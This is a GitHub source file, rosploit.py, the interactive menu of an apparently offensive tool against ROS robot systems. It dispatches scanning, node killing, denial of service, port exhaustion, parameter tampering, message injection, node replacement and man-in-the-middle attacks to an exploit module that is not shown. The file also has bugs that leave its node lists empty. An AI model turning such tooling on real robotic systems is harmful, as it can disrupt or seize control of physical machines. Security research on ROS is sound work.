-
Notifications
You must be signed in to change notification settings - Fork 1
/
rosploit.py
178 lines (143 loc) · 5.53 KB
/
rosploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
import signal
import sys
from typing import List
import exploit
import recon
from core import Node, Message, Topic
node_list = []
topic_list = []
node_name = "/rosploit"
def signal_handler(sig, frame):
print('Caught signal Exiting')
sys.exit(0)
def print_options():
print("Welcome to rosploit")
print("Enter a number to activate that option")
print("0) Exit")
print("1) Run a scan of the system ")
print("2) Display current detected rosgraph")
print("3) Kill a node")
print("4) Run a DOS against a selected host")
print("5) Exhaust all open ports on a selected host")
print("6) List all the parameters on the parameter server")
print("7) Change a parameter on the parameter server")
print("8) Inject data onto a given topic")
print("9) Replace a node with a copy under your control")
print("10) Perform a Man in the Middle(MITM) attack against two nodes over a topic ")
def leave():
save = int(input("Would you like to save your results? (1 for yes)"))
if save == 1:
print("TODO")
sys.exit(0)
def scan_system():
node_list: List[Node] = recon.scan_host('127.0.0.1', '1-', ['ros-master-scan.nse', 'ros-node-id.nse'])
for node in node_list:
node.get_pub_list(node_name)
node.get_sub_list(node_name)
node.get_name(node_name)
if "Master" in node.notes:
topic_list = Topic.from_master(node.server.getPublishedTopics(node_name, ""))
def print_graph():
# TODO: Prettier graph
for node in node_list:
print(node)
for topic in topic_list:
print(topic)
def kill_node():
target_name = input("Enter the name of the node you want to kill")
for node in node_list:
if node.name == target_name:
exploit.kill_node(node, node_name=node_name)
return
print("Failed to find node to kill")
def dos():
target_name = input("Enter the name of the node you want to dos")
for node in node_list:
if node.name == target_name:
exploit.dos(node)
return
print("Failed to find node to dos")
def port_exhaust():
target_name = input("Enter the name of the node you want to exhaust the ports of")
for node in node_list:
if node.name == target_name:
exploit.port_exhaust(target_node=node, node_name=node_name)
return
print("Failed to find node to dos")
def list_param():
for node in node_list:
if "Master" in node.notes:
exploit.list_parameters(node, node_name)
return
print("Failed to find the parameter server")
def change_param():
target_param = input("Enter the name of the param you want to change")
target_value = input("Enter the new value of the param")
for node in node_list:
if "Master" in node.notes:
exploit.change_parameter(node, node_name, target_param, target_value)
return
print("Failed to find the parameter server")
def message_inject():
target_topic = input("Enter the name of the topic you want to inject")
target_node = input("Enter the name of the node you want to inject to")
target_message = input("Enter the message you want to inject (json)")
for node in node_list:
if node.name == target_node:
for topic in topic_list:
if topic.name == target_topic:
exploit.message_injection(target_node=node, target_topic=topic, node_name=node_name,
message=Message.from_json(target_message))
print("Failed to find the topic to inject")
def replace_node():
target_node = input("Enter the name of the node you want to replace")
# TODO: Consider more parameters
for node in node_list:
if node.name == target_node:
exploit.replace_node(target_node=node, node_name=node_name)
print("Failed to replace the node")
def mitm_dummy(message: Message, topic: Topic):
"""
Generic dummy function for the mitm. Just sends each message twice
:param message: The last received message from the publisher
:param topic: the topic
:return:
"""
topic.publish(message)
topic.publish(message)
def mitm():
# Currently the demo function just doubles messages
target_node1 = input("Enter the name of the first node you want to attack for the mitm")
target_node2 = input("Enter the name of the second node you want to attack for the mitm")
topic_name = input("Enter the name of the topic you want to attack for the mitm")
t1 = None
t2 = None
target_topic = None
for node in node_list:
if node.name == target_node2:
t2 = node
if node.name == target_node1:
t1 = node
if t1 and t2:
for topic in topic_list:
if topic.name == topic_name:
target_topic = topic
exploit.mitm(node1=t1, node2=t2, topic=target_topic, node_name=node_name, interface_func=mitm_dummy)
return
print("Failed to find both nodes or topic")
def rosploit():
signal.signal(signal.SIGINT, signal_handler)
function_list = [exit, scan_system, print_graph, kill_node, dos, port_exhaust, list_param, change_param,
message_inject,
replace_node,
mitm]
while True:
print_options()
option = int(input("Select option:"))
if option > len(function_list):
print(option)
print("Invalid Option")
else:
function_list[option]()
if __name__ == "__main__":
rosploit()